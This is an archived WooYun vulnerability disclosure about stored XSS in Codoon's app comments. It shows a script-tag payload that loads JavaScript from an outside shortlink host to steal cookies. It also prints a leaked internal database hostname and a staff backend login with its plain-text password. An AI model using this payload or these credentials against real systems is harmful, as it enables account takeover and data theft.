当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110213

漏洞标题:看我如何利用xss进入咕咚网数据后台

相关厂商:咕咚网

漏洞作者: orange

提交时间:2015-04-24 23:10

修复时间:2015-04-29 23:12

公开时间:2015-04-29 23:12

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

xss+弱口令+配置不当

详细说明:

0x00 插入xss
咕咚网android客户端运动圈 动态的评论处可以输入xss,为了获取后台url,我评论了咕咚小编的动态

</textarea>还不错<script src=http://t.cn/*****></script>


插入xss.png


0x01 触发xss
浏览器网页端评论输出的时候未进行转义,导致xss代码执行,加载外部js
普通用户查看是这样的

js.png


得到的普通用户cookie

usercookie.png


咕咚小编查看评论时也可以触发xss,只不过url不一样
得到的cookie

cookie.png


至此获取到后台地址

http://www.codoon.com/backend/newsfeed/comment_list


0x02 数据库信息泄露
登录我自己的账号后访问上述后台地址
Django未关闭调试信息直接报错

django.png


尝试访问http://www.codoon.com/backend/newsfeed/ 得到更多调试信息
其中很多数据库信息,请厂商自查

{'db': ('aliyunmysql',
'aliyunmysql5401036',
'rdsfviy3ifviy3i1367979506919.mysql.rds.aliyuncs.com'),


尝试访问http://www.codoon.com/backend,普通用户无权限

revoke.png


0x03 忽略漏洞的利用(安全意识淡薄)
上次提交的漏洞至今也没有修复
缺陷编号: WooYun-2015-102995
利用上次漏洞获取到的客服账号密码登录进后台http://www.codoon.com/backend/

账号xutx@codoon.com 密码12345678


query.png


backend.png

漏洞证明:

如上

修复方案:

1.用户输入过滤,网页端输出转义,后台评论显示输出转义;
2.关闭Django调试信息;
3.加强员工安全意识,增强密码强度;
4.漏洞记得确认并修复。

版权声明:转载请注明来源 orange@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-29 23:12

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无